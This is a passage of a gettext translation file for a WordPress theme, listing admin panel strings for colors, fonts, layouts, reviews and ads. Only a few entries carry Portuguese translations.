Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: 